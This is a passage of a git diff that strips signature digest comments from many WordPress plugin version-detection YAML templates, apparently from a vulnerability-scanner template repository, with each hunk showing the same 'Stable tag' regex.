digest: 490a0046304402205c5109cf3bacc2b8cc218a17cfe92ee3fe4d72de8ac73e91373f19d9b8c3d31b0220238301247108e18a2cba0ed47c36b28c5c8faecfd5240ec31685b0d90441bd88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index cb2878e9ad..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e53d59041d41a70647f545a55fcfdff1cdbc2a49aadf9b5f659ae93371918d50220098775c59e3b87e6be78842156c7241c18d7a0b357642133f15f77be8d7cab55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 9a4f30a2f4..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1ddd14f6387bf2982f4bce8fbc3a4947b77511c0efeab680f998557dd7fe530022004d54454b173b3799de58a0775b79229217011002c27b5e37f88e9c4153b93b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index cd27b76ea3..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220199adf3dca06dbafdf15f58c0e059c580c690a47298d88590d067df01557fe3e022100bb1480a6c06a9560a4d844220066a6513f5332c08eff31695cd0d53e308d17f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 9e93023871..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8bf8d7d16e101d6da570588e7d4bda90f3928c5b700764a4e8ac07ca18ae480022100e11a1d19fccc35366ea3bd589f834d04b6ec9ca887e3418c8e53a82ee433cd40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 5273620995..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200cfe429a4d25d4c22eb6a61b7b52d17ebe6c552dd47c64b762c5794e6f97adee0220686ef471e2c5d52316f84fbd116e2399d3593896d23ba69b8dbb1a512672f4f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index d4ca5b8686..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c01646b0575cf57b2cb4501545ed40118eaacea85bcd059deb9ca88cab465cbd022100ef8a8c51ab8767a3f508b14e58f2398285c81a59f4ce9db52471230d7580d406:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 1698aa1627..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022032b67759d95061453c79b65aae1ce69db442ef30e8c3862cefc1fbe2330af108022100e6254d64680e63f7d2d8a7f7af20e6ef835244a4b1c44b2fbb88d6bdd4705a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 2f33e43805..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fbbca3ca6c09d499a91c098066a03d7f924acb85fe36cc16576ac9e094ac6a2f022100933b104bbfea964358b544b4d3f7d430eb5a36fac2ebe8b092fa17a7c9e469d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 6966401293..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a4a26539eb02e22d38401adebe67d953400c3c14e580580d4a8fc3d754ecfcd022100c25d7740d7c685f9e94fbdca6ff1d44d10c350b9f1c81bed889328c190d86f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index d7a9148cad..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c99ce9c2661bdd54d56574864437371d73ab0e3428fa01c6c97b59f4967c5571022100adefcdc30c2ea9fc724bd55cd401ac2cac54da31c66a6220d55be63f65540162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 7f1a05d4fe..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203319cae360469622929a306469361144fb7009f1ec8dd83b0f2c4379d37f28d2022100aa505c450bde75b22e385ee558457c15e2a6b76f9411e9c1c9fab8f7ab057081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c5b8e120d..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a496713fca262e4114aa39459f8d553dde5950316e7bba69b3cc4c620faadfdf0220206948c12de5016492989f912f1c7bdda92ac1c382d195d4ef4b71278bb4062d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 01f0558f86..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acb053fe0a5bfb3aabcd385031058e4b026062054f7be3a2738de05c99fd8cc702210083c1906b99db11b71208f89de95811f00e1f5605d11dfaed947b338b72408fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index aedf03c630..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220706cafe45eb4aafb06ccd9303881494059a06ba5475496cca5464505fd1f57f5022003579197521eaf3e883b42b82cbc71de9317d459db82a1e999fee877229937a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index a4d81b8fc5..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100928cc763b02f807158b7e3774309ded6bc41cee14f18e816d5aa7971d72303aa0221008efd26b1804b4e3a554830db5f5258ac20ee5a7fca4f699de709c9d06eb6e76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index d2d917a53c..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220362d55eacd4e0529ccbcd5c2cc6409c896fbcbe11098945c7a7effa5942ece34022100ea08980ed018f320b620f6a38a225db823f964221f68d98345406d6212596a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 7a4b8307d7..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e2103855103fa095a6a057a621f43f85536b8711147339f17b8a8166d6b704b0220173a7844f0a3b8f36a51940aec38b4f7f9db0e8cdc517786bdba50a446442840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index ba53209246..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb5b9bf4cddc55618adc2637ef5bab88dd83ed99f9c241cf947df4baf73ff4de02210088084bd1099c88dc0d1ecdae1b879ee7ddc22cd559a39ed6a0b6592e487f11a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 3ea8b64b2c..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e160202a9722fcc926977cde9aec31160b512981d9104f157c15844394c211b5022036c9664ae6bb1f496f8f19744ff9a3f22641aaac7a9f24f1527818e0cf00f74e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index e337b0035f..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f30a511bb4cb04fc0d2904238befde7f653d65db079c31038586a084059953b3022001424a080669776cd9b03feddfc4d1d2029642a01b61d97b5845e2d01359ba50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 799aad653f..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a2b8804e1cd5e7e40a434cfad3563d07e88e23891b307e90565da0c8ab4557a02207054488675272bd7d60e9dcab6bdf45610e6d1bc5955611d4ef802ec81c4ec3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 9f6c10f69c..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220756ba6b0e0f30dbeb081bf7c46eeeb63ebb1c2c315075eed2f5ee63b08d0b072022100f50d24aeb7f09b5ac704a3f9ceded626e91d40be83d746eff7a486858c08de8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 4b9385d4ad..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011f85a18447ff448d109a0433febb9f8727ded57766fd8ba80d31b6058e1a350022008759eafea04b10896bb4355555670f1d2272cb38da91efb2259d3bd2eb45eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 19d317ffa8..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a23998cc90decc40981cb31cc864550865e6251a2c3b85f039db19961500120022028dbcd170f15a83a85d19ee42fd87da5169a495f2ea5b70464299de56929d13e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 7c2bc7fc7c..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce7607354ffbd0c6edf64b9f09bc3b5e170bc5eba7d64a2531dae81c8435c844022100b50b2eddded8c1ece094c98530e583ad4fcfdf4c80924f376740919d5a568741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 65abd44a36..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1b42628d60cdb8d761ec22ebc34e1266b2e288637d1408d355608942596727a022016b994ba1d89d06f67aca3d67448816f5295c5e1388555e74a9fdb9ce8e9ddd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 9797b563d8..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f2710add8dc7ba07d9bcd4054db30f6800216725d5ce413c6e89449a0b11e6b022100d362cb55b6719c7183710d999331ce302beacbe382becc20a25a761dc1877964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 14d9002152..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ee1025c95b5a716ddd952fb681405b4bb79f4c49062e84a80a29a005a53fb8f02200807465c86930997a8f42de5696742add674c864bad2814690688a82d8390c3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 75764cf3ef..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100950a254061a9f4333ed1d6b4cde994fe094b918a43e796a4b44236cbdb15ff01022100dfcae8f7a976cd502d31d6119783f695aac6e004a679c221a7d174bfe8fbfa9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index a98c1f3b0f..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa07b543553bcbf298cd20833dac22d3309ade0e5f582cf3ca443de8bc4f3499022100c6aec46e5e4390780bf50b576646b05da18121407bd138878a232f448928bdfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b178ae71ac..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da919fa1a860ce5e7293971adad434fbe43caad3ed1ee5b3f7de49780108aefc022100b56e41b80436f0e0209f54fc1d249904476aaa362c248ab60607d1fa0a38a51e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 1433c032d3..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003e7bb755e61bf228a1a866d8c4c9478623c53f93511aa7cd74addd85104e83b02206438794ba370a44f90e0470f0bf889b02dc0156c3f95cc5403f6008e1aec4fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 841a5de932..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009aeed5e82d2edca95813538ef1e6d2dfb4484d45f0e97075dfcbc7aedff8cac2022100a918d568502a8403d0c22f8d995e578940e42d74a396924de9e6f60737729e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 5647844abf..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220118669fd621d8bc6045fd32d2c5dd90a4d0c427fa19e3db2c4686bd3d8c3d149022005f7269c1de6320915f40dd85b4f9f3e87c9125b62d3b473b53b8092c91992db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 3e2b964e09..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbed62875d3692e3f3e9705bb48c8eab5bf6f28ba462607a07365e2a4050048c022100aa2d0905eabc20d45736a849fbcdd3e9e54f38f729901b6bf8fb5bd97ef4a19c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 1f82539cb2..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050b192331ce5e822e33402dd92a8002f9d5962fc086058a482215fa8ec31adb502203779749438d08de3122ca1acf91eaa6b5d71e616315d9b82bca9ec8f9f89d96d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 242758c719..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052ab1b165373a65038ba5d21657088bc61190c4dbd633b787bafe14872a5be520220209de48da1e61227320ae2e450142291bd5c24f1caf36d0ebfbca616f1af8e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index be11f37b62..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7c325ec42e7b460db367853d16a7b89f71bc6c2cb726da19e69406f9aee847e022038e88ff320bf24e13702b3b6e14b627444a12cd16200b232e39fb2d14f1dabf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 37196f35d3..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e340f466e81bcb1d29bc2aa4e9905cf3fa94a0eac98b175de5182a6f7c580075022100fce1c938bc50f3ec87cbc1b83eb32870f10e5cd6fc08da91eeab1f26ab1ff72e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 072f389604..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220726dfeb1b9aec239a8781a91130662a6c9bbe0b1d2ec6895f08dcf00cd65b38c02206f92900b2194d1b5d6306ec2c9e9762ca10f8ea9032c94a274dd0cf79a163944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index f52ac46b3c..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034c2b56e637f1e917bb28d7161e1697868aa593e5017976991b41b969a8cc55d022043852cf78532243a98502e7afee264a060823b43cf007857a07437932fd2328b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 861281ce9e..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022067410e737af5cf30a97c4ee1b8a6c9399f0db4d0ca0584a0cc16916cf451e8cf02201faa8fa9a10711df21ff5a3e0f4bc06682054d79579a642f762101ef3ebe1d62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 642b41ea90..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2ca75c7396c42a435468465ca5f9c862c8f1119b610c19667bb783fa8929b5c022100cf2337b16d63e5a437490f7772b0a9c9a01e9404b0dd0407c6e96e0cea983431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index fd28201f05..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079e14c32b1b1dcdc5c8dcb9569dca76ee1835a97bf30a7a394eb1ab8b98cf7ec022100a3cf28e73ae7ca74e43f166f322d0ad73f94b0618cbacc75347b579baec72cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 9001fd747c..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207af2d3226ebe74556cfdb256f7a8114f7f2876394b303d235fd7fd914fc8983502205643add2a051fb0cb856cf215fa8dca28eecd90383c03148d33ef08c00e73f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 324f0a0db9..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024506a35e4a3879be770e15d99b3177cead88fdf829b79791dd6cccfb62947d5022100fb9c6bb1f2fe1da117e6f85796d0f533214d9e206521b822033188cf325ca9c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 2c1de654fe..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 